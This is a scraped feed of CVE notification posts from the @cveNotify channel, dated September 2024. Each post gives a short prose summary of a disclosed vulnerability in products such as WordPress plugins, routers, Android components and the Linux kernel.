🚨 CVE-2016-3714The (1) EPHEMERAL, (2) HTTPS, (3) MVG, (4) MSL, (5) TEXT, (6) SHOW, (7) WIN, and (8) PLT coders in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allow remote attackers to execute arbitrary code via shell metacharacters in a crafted image, aka "ImageTragick."🎖@cveNotify |
|
| 2024-09-11 10:37:25 |
🚨 CVE-2024-8096When curl is told to use the Certificate Status Request TLS extension, often referred to as OCSP stapling, to verify that the server certificate is valid, it might fail to detect some OCSP problems and instead wrongly consider the response as fine. If the returned status reports another error than 'revoked' (like for example 'unauthorized') it is not treated as a bad certficate.🎖@cveNotify |
|
| 2024-09-11 10:37:24 |
🚨 CVE-2024-45327An improper authorization vulnerability [CWE-285] in FortiSOAR version 7.4.0 through 7.4.3, 7.3.0 through 7.3.2, 7.2.0 through 7.2.2, 7.0.0 through 7.0.3 change password endpoint may allow an authenticated attacker to perform a brute force attack on users and administrators password via crafted HTTP requests.🎖@cveNotify |
|
| 2024-09-11 10:26:08 |
None |
|
| 2024-09-11 09:37:25 |
🚨 CVE-2024-8277The WooCommerce Photo Reviews Premium plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.3.13.2. This is due to the plugin not properly validating what user transient is being used in the login() function and not properly verifying the user's identity. This makes it possible for unauthenticated attackers to log in as user that has dismissed an admin notice in the past 30 days, which is often an administrator. Alternatively, a user can log in as any user with any transient that has a valid user_id as the value, though it would be more difficult to exploit this successfully.🎖@cveNotify |
|
| 2024-09-11 09:37:24 |
🚨 CVE-2019-25212The video carousel slider with lightbox plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-09-11 08:37:25 |
🚨 CVE-2024-8045The Advanced WordPress Backgrounds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘imageTag’ parameter in all versions up to, and including, 1.12.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-09-11 08:37:24 |
🚨 CVE-2024-7626The WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) plugin for WordPress is vulnerable to arbitrary file movement and reading due to insufficient file path validation in the save_edit_profile_details() function in all versions up to, and including, 1.6.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php). This can also lead to the reading of arbitrary files that may contain sensitive information like wp-config.php.🎖@cveNotify |
|
| 2024-09-11 07:37:24 |
🚨 CVE-2024-8440The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Fancy Text widget in all versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-09-11 06:37:25 |
🚨 CVE-2024-7716The Logo Slider WordPress plugin before 3.6.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-09-11 06:37:24 |
🚨 CVE-2024-3899The Gallery Plugin for WordPress WordPress plugin before 1.8.15 does not sanitise and escape some of its image settings, which could allow users with post-writing privilege such as Author to perform Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2024-09-11 05:37:32 |
🚨 CVE-2024-7721The HTML5 Video Player – mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_password' function in all versions up to, and including, 2.5.34. This makes it possible for authenticated attackers, with Subscriber-level access and above, to set any options that are not explicitly checked as false to an array, including enabling user registration if it has been disabled.🎖@cveNotify |
|
| 2024-09-11 05:37:25 |
🚨 CVE-2024-31336Imagination PowerVR-GPU in Android before 2024-09-05 has a High Severity Vulnerability, aka A-337949672.🎖@cveNotify |
|
| 2024-09-11 05:37:24 |
🚨 CVE-2024-5953A denial of service vulnerability was found in the 389-ds-base LDAP server. This issue may allow an authenticated user to cause a server denial of service while attempting to log in with a user with a malformed hash in their password.🎖@cveNotify |
|
| 2024-09-11 04:37:25 |
🚨 CVE-2024-24972Buffer Copy without Checking Size of Input (CWE-120) in the Controller 6000 and Controller 7000 diagnostic web interface allows an authorised and authenticated operator to reboot the Controller, causing a Denial of Service. Gallagher recommend the diagnostic web page is not enabled (default is off) unless advised by Gallagher Technical support. This interface is intended only for diagnostic purposes.This issue affects: Controller 6000 and Controller 7000 9.10 prior to vCR9.10.240816a (distributed in 9.10.1530 (MR2)), 9.00 prior to vCR9.00.240816a (distributed in 9.00.2168 (MR4)), 8.90 prior to vCR8.90.240816a (distributed in 8.90.2155 (MR5)), 8.80 prior to vCR8.80.240816b (distributed in 8.80.1938 (MR6)), all versions of 8.70 and prior.🎖@cveNotify |
|
| 2024-09-11 04:37:24 |
🚨 CVE-2024-23906Improper Neutralization of Input During Web Page Generation (CWE-79) in the Controller 6000 and Controller 7000 diagnostic webpage allows an attacker to modify Controller configuration during an authenticated Operator's session. This issue affects: Controller 6000 and Controller 7000 9.10 prior to vCR9.10.240816a (distributed in 9.10.1530 (MR2)), 9.00 prior to vCR9.00.240816a (distributed in 9.00.2168 (MR4)), 8.90 prior to vCR8.90.240816a (distributed in 8.90.2155 (MR5)), 8.80 prior to vCR8.80.240816b (distributed in 8.80.1938 (MR6)), all versions of 8.70 and prior.🎖@cveNotify |
|
| 2024-09-11 01:07:28 |
🚨 CVE-2024-38226Microsoft Publisher Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-09-11 01:07:27 |
🚨 CVE-2022-38028Windows Print Spooler Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-09-11 00:37:38 |
🚨 CVE-2024-40662In scheme of Uri.java, there is a possible way to craft a malformed Uri object due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-09-11 00:37:31 |
🚨 CVE-2024-40656In handleCreateConferenceComplete of ConnectionServiceWrapper.java, there is a possible way to reveal images across users due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-09-11 00:37:30 |
🚨 CVE-2024-40655In bindAndGetCallIdentification of CallScreeningServiceHelper.java, there is a possible way to maintain a while-in-use permission in the background due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-09-11 00:37:26 |
🚨 CVE-2024-40652In onCreate of SettingsHomepageActivity.java, there is a possible way to access the Settings app while the device is provisioning due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-09-11 00:37:25 |
🚨 CVE-2024-23716In DevmemIntPFNotify of devicemem_server.c, there is a possible use-after-free due to a race condition. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-09-10 22:37:25 |
🚨 CVE-2024-45597Pluto is a superset of Lua 5.4 with a focus on general-purpose programming. Scripts passing user-controlled values to http.request header values are affected. An attacker could use this to send arbitrary requests, potentially leveraging authentication tokens provided in the same headers table.🎖@cveNotify |
|
| 2024-09-10 22:37:24 |
🚨 CVE-2024-44815Vulnerability in Hathway Skyworth Router CM5100 v.4.1.1.24 allows a physically proximate attacker to obtain user credentials via SPI flash Firmware W25Q64JV.🎖@cveNotify |
|
| 2024-09-10 21:37:43 |
🚨 CVE-2024-44104An incorrectly implemented authentication scheme that is subjected to a spoofing attack in the management console of Ivanti Workspace Control version 10.18.0.0 and below allows a local authenticated attacker to escalate their privileges.🎖@cveNotify |
|
| 2024-09-10 21:37:36 |
🚨 CVE-2023-37233Loftware Spectrum before 4.6 HF14 allows authenticated XXE attacks.🎖@cveNotify |
|
| 2024-09-10 21:37:35 |
🚨 CVE-2024-7201The login functionality of WinMatrix3 Web package from Simopro Technology lacks proper validation of user input, allowing unauthenticated remote attackers to inject SQL commands to read, modify, and delete database contents.🎖@cveNotify |
|
| 2024-09-10 21:37:31 |
🚨 CVE-2024-3177A security issue was discovered in Kubernetes where users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using containers, init containers, and ephemeral containers with the envFrom field populated. The policy ensures pods running with a service account may only reference secrets specified in the service account’s secrets field. Kubernetes clusters are only affected if the ServiceAccount admission plugin and the kubernetes.io/enforce-mountable-secrets annotation are used together with containers, init containers, and ephemeral containers with the envFrom field populated.🎖@cveNotify |
|
| 2024-09-10 21:37:30 |
🚨 CVE-2024-23680AWS Encryption SDK for Java versions 2.0.0 to 2.2.0 and less than 1.9.0 incorrectly validates some invalid ECDSA signatures.🎖@cveNotify |
|
| 2024-09-10 21:37:26 |
🚨 CVE-2023-42841The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.1, iOS 17.1 and iPadOS 17.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Ventura 13.6.1. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-09-10 21:37:25 |
🚨 CVE-2023-45844The vulnerability allows a low privileged user that have access to the device when locked in Kiosk mode to install an arbitrary Android application and leverage it to have access to critical device settings such as the device power management or eventually the device secure settings (ADB debug).🎖@cveNotify |
|
| 2024-09-10 21:37:24 |
🚨 CVE-2023-41721Instances of UniFi Network Application that (i) are run on a UniFi Gateway Console, and (ii) are versions 7.5.176. and earlier, implement device adoption with improper access control logic, creating a risk of access to device configuration information by a malicious actor with preexisting access to the network.Affected Products:UDMUDM-PROUDM-SEUDRUDW Mitigation:Update UniFi Network to Version 7.5.187 or later.🎖@cveNotify |
|
| 2024-09-10 21:07:25 |
🚨 CVE-2024-6911Files on the Windows system are accessible without authentication to external parties due to a local file inclusion in PerkinElmer ProcessPlus.This issue affects ProcessPlus: through 1.11.6507.0.🎖@cveNotify |
|
| 2024-09-10 21:07:24 |
🚨 CVE-2024-6122An incorrect permission in the installation directory for the shared NI SystemLink Server KeyValueDatabase service may result in information disclosure via local access. This affects NI SystemLink Server 2024 Q1 and prior versions. It also affects NI FlexLogger 2023 Q2 and prior versions which installed this shared service.🎖@cveNotify |
|
| 2024-09-10 20:37:25 |
🚨 CVE-2023-40408An inconsistent user interface issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. Hide My Email may be deactivated unexpectedly.🎖@cveNotify |
|
| 2024-09-10 20:37:24 |
🚨 CVE-2023-42490EisBaer Scada - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor🎖@cveNotify |
|
| 2024-09-10 20:07:26 |
🚨 CVE-2024-6898A vulnerability was found in SourceCodester Record Management System 1.0. It has been classified as critical. This affects an unknown part of the file index.php. The manipulation of the argument UserName leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271923.🎖@cveNotify |
|
| 2024-09-10 20:07:25 |
🚨 CVE-2024-40628JumpServer is an open-source Privileged Access Management (PAM) tool that provides DevOps and IT teams with on-demand and secure access to SSH, RDP, Kubernetes, Database and RemoteApp endpoints through a web browser. An attacker can exploit the ansible playbook to read arbitrary files in the celery container, leading to sensitive information disclosure. The Celery container runs as root and has database access, allowing the attacker to steal all secrets for hosts, create a new JumpServer account with admin privileges, or manipulate the database in other ways. This issue has been addressed in release versions 3.10.12 and 4.0.0. It is recommended to upgrade the safe versions. There is no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-09-10 20:07:24 |
🚨 CVE-2023-32467Dell Edge Gateway BIOS, versions 3200 and 5200, contains an out-of-bounds write vulnerability. A local authenticated malicious user with high privileges could potentially exploit this vulnerability leading to exposure of some UEFI code, leading to arbitrary code execution or escalation of privilege.🎖@cveNotify |
|
| 2024-09-10 19:37:25 |
🚨 CVE-2024-45191An issue was discovered in Matrix libolm through 3.2.16. The AES implementation is vulnerable to cache-timing attacks due to use of S-boxes. This is related to software that uses a lookup table for the SubWord step. This refers to the libolm implementation of Olm. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-09-10 19:37:24 |
🚨 CVE-2024-399111Panel is a web-based linux server management control panel. 1Panel contains an unspecified sql injection via User-Agent handling. This issue has been addressed in version 1.10.12-lts. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-09-10 19:07:30 |
🚨 CVE-2024-42277In the Linux kernel, the following vulnerability has been resolved:iommu: sprd: Avoid NULL deref in sprd_iommu_hw_enIn sprd_iommu_cleanup() before calling function sprd_iommu_hw_en()dom->sdev is equal to NULL, which leads to null dereference.Found by Linux Verification Center (linuxtesting.org) with SVACE.🎖@cveNotify |
|
| 2024-09-10 19:07:26 |
🚨 CVE-2024-23475The SolarWinds Access Rights Manager was susceptible to a Directory Traversal and Information Disclosure Vulnerability. This vulnerability allows an unauthenticated user to perform arbitrary file deletion and leak sensitive information.🎖@cveNotify |
|
| 2024-09-10 19:07:25 |
🚨 CVE-2024-23465The SolarWinds Access Rights Manager was found to be susceptible to an authentication bypass vulnerability. This vulnerability allows an unauthenticated user to gain domain admin access within the Active Directory environment.🎖@cveNotify |
|
| 2024-09-10 19:07:24 |
🚨 CVE-2023-32472Dell Edge Gateway BIOS, versions 3200 and 5200, contains an out-of-bounds write vulnerability. A local authenticated malicious user with high privileges could potentially exploit this vulnerability leading to exposure of some code in System Management Mode, leading to arbitrary code execution or escalation of privilege.🎖@cveNotify |
|
| 2024-09-10 18:37:30 |
🚨 CVE-2024-43477Improper access control in Decentralized Identity Services resulted in a vulnerability that allows an unauthenticated attacker to disable Verifiable ID's on another tenant.🎖@cveNotify |
|
| 2024-09-10 18:37:26 |
🚨 CVE-2024-21796Electronic Deliverables Creation Support Tool (Construction Edition) prior to Ver1.0.4 and Electronic Deliverables Creation Support Tool (Design & Survey Edition) prior to Ver1.0.4 improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.🎖@cveNotify |
|
| 2024-09-10 18:37:25 |
🚨 CVE-2019-14928An issue was discovered on Mitsubishi Electric Europe B.V. ME-RTU devices through 2.02 and INEA ME-RTU devices through 3.0. A number of stored cross-site script (XSS) vulnerabilities allow an attacker to inject malicious code directly into the application. An example input variable vulnerable to stored XSS is SerialInitialModemString in the index.php page.🎖@cveNotify |
|
| 2024-09-10 18:07:40 |
🚨 CVE-2024-44676eladmin v2.7 and before is vulnerable to Cross Site Scripting (XSS) which allows an attacker to execute arbitrary code via LocalStoreController. java.🎖@cveNotify |
|
| 2024-09-10 18:07:34 |
🚨 CVE-2024-31960An issue was discovered in Samsung Mobile Processor Exynos 1480, Exynos 2400. The xclipse amdgpu driver has a reference count bug. This can lead to a use after free.🎖@cveNotify |
|
| 2024-09-10 18:07:33 |
🚨 CVE-2023-37232Loftware Spectrum through 4.6 exposes Sensitive Information (Logs) to an Unauthorized Actor.🎖@cveNotify |
|
| 2024-09-10 18:07:32 |
🚨 CVE-2023-36103Command Injection vulnerability in goform/SetIPTVCfg interface of Tenda AC15 V15.03.05.20 allows remote attackers to run arbitrary commands via crafted POST request.🎖@cveNotify |
|
| 2024-09-10 18:07:28 |
🚨 CVE-2024-41036In the Linux kernel, the following vulnerability has been resolved:net: ks8851: Fix deadlock with the SPI chip variantWhen SMP is enabled and spinlocks are actually functional then there isa deadlock with the 'statelock' spinlock between ks8851_start_xmit_spiand ks8851_irq: watchdog: BUG: soft lockup - CPU#0 stuck for 27s! call trace: queued_spin_lock_slowpath+0x100/0x284 do_raw_spin_lock+0x34/0x44 ks8851_start_xmit_spi+0x30/0xb8 ks8851_start_xmit+0x14/0x20 netdev_start_xmit+0x40/0x6c dev_hard_start_xmit+0x6c/0xbc sch_direct_xmit+0xa4/0x22c __qdisc_run+0x138/0x3fc qdisc_run+0x24/0x3c net_tx_action+0xf8/0x130 handle_softirqs+0x1ac/0x1f0 __do_softirq+0x14/0x20 ____do_softirq+0x10/0x1c call_on_irq_stack+0x3c/0x58 do_softirq_own_stack+0x1c/0x28 __irq_exit_rcu+0x54/0x9c irq_exit_rcu+0x10/0x1c el1_interrupt+0x38/0x50 el1h_64_irq_handler+0x18/0x24 el1h_64_irq+0x64/0x68 __netif_schedule+0x6c/0x80 netif_tx_wake_queue+0x38/0x48 ks8851_irq+0xb8/0x2c8 irq_thread_fn+0x2c/0x74 irq_thread+0x10c/0x1b0 kthread+0xc8/0xd8 ret_from_fork+0x10/0x20This issue has not been identified earlier because tests were done ona device with SMP disabled and so spinlocks were actually NOPs.Now use spin_(un)lock_bh for TX queue related locking to avoid executionof softirq work synchronously that would lead to a deadlock.🎖@cveNotify |
|
| 2024-09-10 18:07:27 |
🚨 CVE-2024-21303SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-09-10 17:37:32 |
🚨 CVE-2018-16060Mitsubishi Electric Europe B.V. SmartRTU devices allow remote attackers to obtain sensitive information (directory listing and source code) via a direct request to the /web URI.🎖@cveNotify |
|
| 2024-09-10 17:37:26 |
🚨 CVE-2019-14931An issue was discovered on Mitsubishi Electric Europe B.V. ME-RTU devices through 2.02 and INEA ME-RTU devices through 3.0. An unauthenticated remote OS Command Injection vulnerability allows an attacker to execute arbitrary commands on the RTU due to the passing of unsafe user supplied data to the RTU's system shell. Functionality in mobile.php provides users with the ability to ping sites or IP addresses via Mobile Connection Test. When the Mobile Connection Test is submitted, action.php is called to execute the test. An attacker can use a shell command separator (;) in the host variable to execute operating system commands upon submitting the test data.🎖@cveNotify |
|
| 2024-09-10 17:37:25 |
🚨 CVE-2019-14925An issue was discovered on Mitsubishi Electric Europe B.V. ME-RTU devices through 2.02 and INEA ME-RTU devices through 3.0. A world-readable /usr/smartrtu/init/settings.xml configuration file on the file system allows an attacker to read sensitive configuration settings such as usernames, passwords, and other sensitive RTU data due to insecure permission assignment.🎖@cveNotify |
|
| 2024-09-10 17:07:24 |
🚨 CVE-2019-16638An issue was found on the Ruijie EG-2000 series gateway. An attacker can easily dump cleartext stored passwords in /data/config.text with simple XORs. This affects EG-2000SE EG_RGOS 11.1(1)B1.🎖@cveNotify |
|
| 2024-09-10 16:37:44 |
🚨 CVE-2023-37232Loftware Spectrum through 4.6 exposes Sensitive Information (Logs) to an Unauthorized Actor.🎖@cveNotify |
|
| 2024-09-10 16:37:43 |
🚨 CVE-2024-37728Arbitrary File Read vulnerability in Xi'an Daxi Information Technology Co., Ltd OfficeWeb365 v.7.18.23.0 and v8.6.1.0 allows a remote attacker to obtain sensitive information via the "Pic/Indexes" interface🎖@cveNotify |
|
| 2024-09-10 16:37:42 |
🚨 CVE-2024-42759An issue in Ellevo v.6.2.0.38160 allows a remote attacker to escalate privileges via the /api/usuario/cadastrodesuplente endpoint.🎖@cveNotify |
|
| 2024-09-10 16:37:38 |
🚨 CVE-2024-38493A reflected cross-site scripting (XSS) vulnerability exists in the PAM UI web interface. A remote attacker able to convince a PAM user to click on a specially crafted link to the PAM UI web interface could potentially execute arbitrary client-side code in the context of PAM UI.🎖@cveNotify |
|
| 2024-09-10 16:37:37 |
🚨 CVE-2024-31947StoneFly Storage Concentrator (SC and SCVM) before 8.0.4.26 allows Directory Traversal by authenticated users. Using a crafted path parameter with the Online Help facility can expose sensitive system information.🎖@cveNotify |
|
| 2024-09-10 16:37:36 |
🚨 CVE-2024-40690IBM InfoSphere Server 11.7 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 297720.🎖@cveNotify |
|
| 2024-09-10 16:37:32 |
🚨 CVE-2023-48680Sensitive information disclosure due to excessive collection of system information. The following products are affected: Acronis Cyber Protect 16 (macOS, Windows) before build 37391.🎖@cveNotify |
|
| 2024-09-10 16:37:31 |
🚨 CVE-2023-45246Sensitive information disclosure and manipulation due to missing authorization. The following products are affected: Acronis Cyber Protect Cloud Agent (Linux, macOS, Windows) before build 36343.🎖@cveNotify |
|
| 2024-09-10 16:37:30 |
🚨 CVE-2023-44156Sensitive information disclosure due to spell-jacking. The following products are affected: Acronis Cyber Protect 15 (Linux, Windows) before build 35979.🎖@cveNotify |
|
| 2024-09-10 16:37:26 |
🚨 CVE-2022-30159Microsoft Office Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-09-10 16:37:25 |
🚨 CVE-2022-29149Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-09-10 16:07:55 |
🚨 CVE-2023-37230Loftware Spectrum (testDeviceConnection) before 5.1 allows SSRF.🎖@cveNotify |
|
| 2024-09-10 16:07:54 |
🚨 CVE-2023-37226Loftware Spectrum before 4.6 HF14 has Missing Authentication for a Critical Function.🎖@cveNotify |
|
| 2024-09-10 16:07:50 |
🚨 CVE-2024-6282The Master Addons – Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-jltma-wrapper-link element in all versions up to, and including 2.0.6.4 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user clicks on the injected link.🎖@cveNotify |
|
| 2024-09-10 16:07:49 |
🚨 CVE-2024-8580A vulnerability classified as critical was found in TOTOLINK AC1200 T8 4.1.5cu.861_B20230220. This vulnerability affects unknown code of the file /etc/shadow.sample. The manipulation leads to use of hard-coded password. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-10 16:07:45 |
🚨 CVE-2024-8579A vulnerability classified as critical has been found in TOTOLINK AC1200 T8 4.1.5cu.861_B20230220. This affects the function setWiFiRepeaterCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument password leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-10 16:07:44 |
🚨 CVE-2024-8566A vulnerability classified as problematic was found in code-projects Online Shop Store 1.0. This vulnerability affects unknown code of the file /settings.php. The manipulation of the argument error leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-10 16:07:43 |
🚨 CVE-2024-8565A vulnerability was found in SourceCodesters Clinics Patient Management System 2.0. It has been rated as critical. This issue affects some unknown processing of the file /print_diseases.php. The manipulation of the argument disease/from/to leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-10 16:07:40 |
🚨 CVE-2024-8564A vulnerability was found in SourceCodester PHP CRUD 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /endpoint/update.php. The manipulation of the argument tbl_person_id/first_name/middle_name/last_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-10 16:07:39 |
🚨 CVE-2024-8558A vulnerability classified as problematic was found in SourceCodester Food Ordering Management System 1.0. This vulnerability affects unknown code of the file /foms/routers/place-order.php of the component Price Handler. The manipulation of the argument total leads to improper validation of specified quantity in input. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-10 16:07:38 |
🚨 CVE-2024-3297An issue in the Certificate Authenticated Session Establishment (CASE) protocol for establishing secure sessions between two devices, as implemented in the Matter protocol versions before Matter 1.1 allows an attacker to replay manipulated CASE Sigma1 messages to make the device unresponsive until the device is power-cycled.🎖@cveNotify |
|
| 2024-09-10 15:08:01 |
🚨 CVE-2024-4607Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU memory processing operations to gain access to already freed memory.This issue affects Bifrost GPU Kernel Driver: from r41p0 through r49p0; Valhall GPU Kernel Driver: from r41p0 through r49p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p0.🎖@cveNotify |
|
| 2024-09-10 15:08:00 |
🚨 CVE-2024-38503When editing a user, group or any object in the Syncope Console, HTML tags could be added to any text field and could lead to potential exploits.The same vulnerability was found in the Syncope Enduser, when editing “Personal Information” or “User Requests”.Users are recommended to upgrade to version 3.0.8, which fixes this issue.🎖@cveNotify |
|
| 2024-09-10 15:07:59 |
🚨 CVE-2024-6799The YITH Essential Kit for WooCommerce #1 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'activate_module', 'deactivate_module', and 'install_module' functions in all versions up to, and including, 2.34.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install, activate, and deactivate plugins from a pre-defined list of available YITH plugins.🎖@cveNotify |
|
| 2024-09-10 14:37:53 |
🚨 CVE-2024-8654MongoDB Server may access non-initialized region of memory leading to unexpected behaviour when zero arguments are called in internal aggregation stage. This issue affected MongoDB Server v6.0 version 6.0.3.🎖@cveNotify |
|
| 2024-09-10 14:37:46 |
🚨 CVE-2024-37728Arbitrary File Read vulnerability in Xi'an Daxi Information Technology Co., Ltd OfficeWeb365 v.7.18.23.0 and v8.6.1.0 allows a remote attacker to obtain sensitive information via the "Pic/Indexes" interface🎖@cveNotify |
|
| 2024-09-10 14:37:45 |
🚨 CVE-2023-37230Loftware Spectrum (testDeviceConnection) before 5.1 allows SSRF.🎖@cveNotify |
|
| 2024-09-10 14:37:41 |
🚨 CVE-2023-37226Loftware Spectrum before 4.6 HF14 has Missing Authentication for a Critical Function.🎖@cveNotify |
|
| 2024-09-10 14:37:40 |
🚨 CVE-2024-45845nix 2.24 through 2.24.5 allows directory traversal via a symlink in a nar file, because of mishandling of a directory containing a symlink and a directory of the same name, aka GHSA-h4vv-h3jq-v493.🎖@cveNotify |
|
| 2024-09-10 14:37:39 |
🚨 CVE-2024-40754Heap-based Buffer Overflow vulnerability in Samsung Open Source Escargot JavaScript engine allows Overflow Buffers.This issue affects Escargot: 4.0.0.🎖@cveNotify |
|
| 2024-09-10 14:37:36 |
🚨 CVE-2024-44411D-Link DI-8300 v16.07.26A1 is vulnerable to command injection via the msp_info_htm function.🎖@cveNotify |
|
| 2024-09-10 14:37:35 |
🚨 CVE-2024-41107The CloudStack SAML authentication (disabled by default) does not enforce signature check. In CloudStack environments where SAML authentication is enabled, an attacker that initiates CloudStack SAML single sign-on authentication can bypass SAML authentication by submitting a spoofed SAML response with no signature and known or guessed username and other user details of a SAML-enabled CloudStack user-account. In such environments, this can result in a complete compromise of the resources owned and/or accessible by a SAML enabled user-account.Affected users are recommended to disable the SAML authentication plugin by setting the "saml2.enabled" global setting to "false", or upgrade to version 4.18.2.2, 4.19.1.0 or later, which addresses this issue.🎖@cveNotify |
|
| 2024-09-10 14:37:34 |
🚨 CVE-2024-29014Vulnerability in SonicWall SMA100 NetExtender Windows (32 and 64-bit) client 10.2.339 and earlier versions allows an attacker to arbitrary code execution when processing an EPC Client update.🎖@cveNotify |
|
| 2024-09-10 14:07:33 |
🚨 CVE-2024-8554A vulnerability was found in SourceCodester Clinics Patient Management System 2.0 and classified as problematic. This issue affects some unknown processing of the file /users.php. The manipulation of the argument message leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-10 14:07:32 |
🚨 CVE-2024-42642Micron Crucial MX500 Series Solid State Drives M3CR046 is vulnerable to Buffer Overflow, which can be triggered by sending specially crafted ATA packets from the host to the drive controller.🎖@cveNotify |
|
| 2024-09-10 14:07:29 |
🚨 CVE-2024-29178On versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code Execution on the server, The attacker must successfully log into the system to launch an attack, so this is a moderate-impact vulnerability.Mitigation:all users should upgrade to 2.1.4🎖@cveNotify |
|
| 2024-09-10 14:07:28 |
🚨 CVE-2024-40764Heap-based buffer overflow vulnerability in the SonicOS IPSec VPN allows an unauthenticated remote attacker to cause Denial of Service (DoS).🎖@cveNotify |
|
| 2024-09-10 14:07:27 |
🚨 CVE-2024-6089An input validation vulnerability exists in the Rockwell Automation 5015 - AENFTXT when a manipulated PTP packet is sent, causing the secondary adapter to result in a major nonrecoverable fault. If exploited, a power cycle is required to recover the product.🎖@cveNotify |
|
| 2024-09-10 12:37:49 |
🚨 CVE-2024-27364An issue was discovered in Mobile Processor, Wearable Processor Exynos 980, Exynos 850, Exynos 1080, Exynos 1280, Exynos 1380, Exynos 1330, Exynos 1480, Exynos W920, Exynos W930. In the function slsi_rx_roamed_ind(), there is no input validation check on a length coming from userspace, which can lead to a potential heap over-read.🎖@cveNotify |
|
| 2024-09-10 12:37:42 |
🚨 CVE-2024-7341A session fixation issue was discovered in the SAML adapters provided by Keycloak. The session ID and JSESSIONID cookie are not changed at login time, even when the turnOffChangeSessionIdOnLogin option is configured. This flaw allows an attacker who hijacks the current session before authentication to trigger session fixation.🎖@cveNotify |
|
| 2024-09-10 12:37:41 |
